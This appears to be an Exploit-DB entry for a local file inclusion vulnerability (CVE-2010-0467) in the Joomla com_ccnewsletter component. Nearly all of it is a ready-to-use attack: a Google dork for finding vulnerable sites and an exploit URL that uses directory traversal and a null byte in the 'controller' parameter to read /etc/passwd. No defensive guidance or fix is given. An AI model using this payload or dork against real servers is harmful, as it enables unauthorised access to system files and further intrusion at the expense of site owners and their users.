Joomla Component com_ccnewsletter LFI Vulnerability



EDB-ID: 11282 CVE: 2010-0467 OSVDB-ID: 62000
Author: AtT4CKxT3rR0r1ST Published: 2010-01-28 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Joomla Component com_ccnewsletter Local File Inclusion
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Home           : www.sec-attack.com/vb

.:. Script         : Joomla Component com_ccnewsletter

.:. Bug Type       : Local File Inclusion [LFI]

.:. Dork           : inurl:"com_ccnewsletter"

.:. Date           : 28/1/2010

#############################################

===[ Exploit ]===

http://server/index.php?option=com_ccnewsletter&controller=[LFI]

http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00


#############################################

Greats T0: My Mind & All member Sec Attack